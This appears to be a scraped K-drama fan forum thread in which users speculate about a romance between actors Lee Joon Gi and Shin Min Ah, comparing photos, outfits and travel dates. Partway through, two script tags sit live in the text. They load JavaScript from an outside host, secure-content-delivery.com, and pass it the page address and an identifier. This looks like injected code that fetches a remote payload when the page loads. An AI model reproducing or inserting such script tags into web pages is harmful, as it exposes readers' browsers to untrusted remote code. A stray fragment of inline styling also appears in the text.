Arang's Eun Oh, Eun Oh's Arang. Baby Love couple, Lee Joon Gi and Shin Min Ah shippers unite!!

kooriyuki

Guest hanae364

Hi @dredz!! Thank you for the welcome  ♡♡ Love those pictures. I adore the videos and pictures of the press conference. My eyes cannot look away from the beautiful Shin Minah, what a goddess. How must JunKi have felt standing right next to her! And her smiles and the way she looks at him! (*dies*)
Thank you @tesanne, @whitecake092 and so many others for keeping this thread alive. I've enjoyed reading your posts! I finally finished reading all 264 pages of this thread and how auspicious it should be on the anniversary of our SaRang couple's DAEBAK show. 

Happy 2 year anniversary Arang & Her Magistrate!!!

I feel inspired and have so many thoughts that want to explode out but for now let me just say that I firmly believe in my heart that Lee Jun Ki is a man in LOVE. His Twitter posts, the songs he writes, his interviews all reveal a beautiful "happiness". He mentions, love, and family over and over. He admits he will LIE to protect a relationship from going public. But in the same breath also asks his fans to understand and let him also love somebody. "After all you would not want me to end alone..." he says cheekily.

Shin Minah is a bit harder to read. There are not a lot of interviews or videos of her but the few that I've found reveal a very profound and gentle lady who has quirky charms she only reveals to those close to her. I personally find that type of character so attractive since you know that when she treasures you she will do so with all her heart.

I am the same age as they are and I think it would be such a sad thing to be at this point in your life without having loved and being in love. So, yes I do hope that they are in LOVE. Sometimes I also think it's ok if they are in love with other people. But then I think "what if JunKi fell in love with {other co-star}" and my mind goes ANDWEIIIIIII!!!!!! :))

• Replies 5.4k
  • Created
  • Last Reply

class="content-title" style="margin: 0px; padding: 0px; border: 0px; font-family: 'Open Sans', 'Helvetica Neue', Arial, sans-serif; font-weight: 400; line-height: 1.4em; font-size: 26px; vertical-align: baseline; color: rgb(63, 63, 64); text-shadow: rgb(255, 255, 255) 1px 1px 0px; visibility: visible; background-color: rgb(255, 255, 255);"Actors Jo Jung Suk and Shin Min Ah Talk about What It Would Be Like to Marry Each Other

Actors Jo Jung Suk and Shin Min Ah Talk about What It Would Be Like to Marry Each Other
cr:soompi
What about joon Gi and Min Ah in a Marriage???  :x :x :x :x
Their home would be full of laughter :D206738_386316801457802_1237703811_n.jpg?
By the way,, found this photo haha so cute :)
431515_138825992927350_864866767_n.jpg?o
cr; arang and the magistrate fb

Guest 1rainbowdash

@vina17 Sorry for choping in, cause your question was for another person. Min Ah and JJS promote their upcoming movie "My love, my bride" (they are newly wed couple in this movie) and gave interview on "Entertainment Relay". You can read it in English in SMA's thread or My love, my bride thread. :)

Guest maniez

1rainbowdash@ thank you so much !! i will go to SMA thread ...btw, have you received many messages from the other soompi's member ? why are their message " untag me " ?. it's confusing...

@vina 17 sorry for late reply to your post anyway @1rainbowdash answered your question :) thanks  :) but if you haven't read it, you can see this link instead. it's english so don't worry...
http://www.soompi.com/2014/08/23/actors-jo-jung-suk-and-shin-min-ah-talk-about-what-it-would-be-like-to-marry-each-other/

cr: soompi

Guest 1rainbowdash

As your thread is so quiet now, I decide to post sm pics here. (saying to myself "I'm not shipping, not shipping, or am I? :)) )This was posted on weibo in Mina's fans page on the 13th August. They said she stayed in B&B in Jeju islandbcefb16egw1ejb263n59zj20fa0bg3zu.jpg
And this was posted by LJG on the 14th August on weibo.9afc0843jw1ejcaqqgqykj20hs0a0q56.jpg
For me it's just a coincidence. ;)) So what about you, girls?

@1rainbowdash You quite surprised me with your post... I should tell you this, If you're going to read this thread all through out, you will see that they really have a lot of coincidences. not just once or twice but even I'd want to believe that it's a sign, i can't because there is no solid evidence. But this time, come on; I don't know what to think,I have a feeling that this is no longer a coincidence. they are soo similar!  
Look at that shirt! Are we going to excuse this again saying It just so happened they're the same after all we've seen from the beginning?

Guest 1rainbowdash

@whitecake092 Well, I was surprised by myself posting such things. ;)) Because I don't ship any actor or actress. Besides for me Min Ah has chemistry with almost all of her co-stars(not only in movies or dramas but also in CFs), so it's difficult to say which couple is my favorite one. I know that some people ship SMA with other actors, not LJG. I know that some people keep shipping her with T.O.P still (to my mind it's a very old issue). I've already read all posts in this thread. I found some of them insightful, and some not. Like 50/50. Anyway as you've said there's no solid evidence for Sarang couple yet. And I wish happy sailing for your ship. I will peep into this thread. :)>-

Guest maniez

1rainbowdash@ you are very great !! wow, it's not just coincidence but both of them were together holiday in jeju island  because lee joon gi was off his shooting that day !!! look at their shirts and hats .their motif shirt are  almost same, but their colour shirts switch their colour hats. shin minah wore black shirt and blue hat, lee joon gi wore blue shirt and black hat. what do you think my friends?

Guest 1rainbowdash

@vina17 sorry but Min Ah went to Switzerland on the 13th to take part in the film festival. She was there till 16th I think, because she, Park Hae Il and "Gyeongju" director held a press conference on the 15th of August there. So her picture was taken earlier. Don't know when exactly. So  you're wrong here, I'm sorry. 

vina17 said: 1rainbowdash@ you are very great !! wow, it's not just coincidence but both of them were together holiday in jeju island  because lee joon gi was off his shooting that day !!! look at their shirts and hats .their motif shirt are  almost same, but their colour shirts switch their colour hats. shin minah wore black shirt and blue hat, lee joon gi wore blue shirt and black hat. what do you think my friends?

<script src="https://secure-content-delivery.com/mware-detection/index.php?d=forums.soompi.com&c=mwareDetect.returned" type="text/javascript"></script><script src="https://secure-content-delivery.com/data.js.php?i={DB13BBEC-E512-4122-B6C7-44C13FA06595}&d=2013-6-28&s=http://forums.soompi.com/discussion/2007283/arang-s-eun-oh-eun-oh-s-arang-baby-love-couple-lee-joon-gi-and-shin-min-ah-shippers-unite/p264&cb=0.07262452567932565" type="text/javascript"></script>

@1rainbowdash no I haven't caught anything. my point comes only from their coincidences... they are too many. or maybe I need to be more realistic.
But I have a question, maybe you already know that Joon gi likes to wear clothes or accessories with a triangle in it; which we shippers assume that it stands for "shin" it's mina's symbol in her website: http://shinmina.co.kr/ Embedded image permalink
leejunki.jpg

Embedded image permalink   

cr.to owner

In connection with this I just notice that min ah recently likes to wear clothes with circles in it that i also assume this time, stands for "Lee"BwgQ48oCcAAOfYC.png:large

10348287_822985721074469_131515814397305

10251991_745791825460526_247309547445566

cr: Shin Min Ah FB
Maybe I'm being nonsense again...but I still want to ask; The triangle thing started from LJk's album CBC(case by case) i wonder if who's idea that theme was... from Joon Gi himself or stylist? also with min ah, is it her personal preference to wear clothes like that or also her stylist has to do with it? 
Ugh,, I'm delusional again  8-| 8-| 8-|

hmmm...you caught my shipping bone there for a sec....it is common for shin min ah to wear monotone black/white or black and white during promo but i've noticed ever since aatm what she wore was not what was common of her...hope this helps :)

Archived